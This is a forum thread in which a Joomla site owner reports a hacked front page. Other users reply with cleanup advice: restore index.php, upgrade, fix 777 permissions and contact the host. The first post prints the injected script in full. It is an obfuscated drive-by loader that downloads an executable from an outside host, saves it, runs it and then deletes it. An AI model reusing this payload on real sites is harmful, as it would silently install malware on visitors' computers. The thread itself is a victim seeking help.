Has my site been hacked?

[stingray001]

Recently, when i visit my website, it shows a blank white page instead of the frontpage.
Upon looking at the source code, i found this:

Code: Select all

<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://www.freewebtown.com/aljn/tam.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>

However, when i try accesing through another round-about URL(http://xxxx.xxxxxx.xxx//index.php/home) and my Admin panel, it seems fine.

I've checked my template HTML and CSS, but couldn't find that particular code.

I'm using Joomla 1.5RC 3 with RedEvo Aphelion - Joomla! 1.5 Template.

Can anyone who knows this thing please help me, cause this is pretty urgent, thanks!

Additional Info:
Apache version 1.3.39 (Unix)
PHP version 5.2.5
MySQL version 4.1.22-standard

[debreczeniandras]

Yes, you've been hacked.

Check - regularly - the FAQ page of Joomla!
http://help.joomla.org/component/option ... temid,268/

And especially this section: Where can I learn about vulnerable extensions?
http://help.joomla.org/component/option ... temid,268/

To quickly correct this error, simply replace the index.php found in your joomla root directory with the one you used at installation. (not the index.php in your template directory!!)
But please do consider upgrading:
Nightly build: http://dev.joomla.org/content/view/17/60/

Check proper file and directory permissions!
What are the recommended file and directory permissions?
http://help.joomla.org/component/option ... temid,268/

And start posting in the right forum.
Discussion regarding Joomla! 1.5 security issues.
http://forum.joomla.org/index.php/board,432.0.html

[stingray001]

Oh gosh...
I don't know whether it's Joomla fault, but i found a index.html document which carries the code in my website directory...

OK, opps seems like i'm so worried about it till i post it at the wrong section of the forum><
Kindly any mods help me shift this topic to the correct place please, sorry for the inconvenience.

[infograf768]

I don't know whether it's Joomla fault,

I doubt so... it is usually not.

[mandville]

check all your folder permissions to ensure they are not 777.  notify the host for the bad script that they have a naughty user.

[stingray001]

check all your folder permissions to ensure they are not 777.  notify the host for the bad script that they have a naughty user.

I found that the particular joomla folder was changed to permission 777
Anyway, I've contacted the server admin so as to obtain information about the person.

By the way, I saw that people were able to track them using RAW Logs.
However, I don't read RAW Logs, so if i post them here, would anyone be willing to help me find out how the hacker attack my site?

[mandville]

i ams sure someone will be able to assist but if you look around gor a free raw log reader online that would assist you in learning how to read them..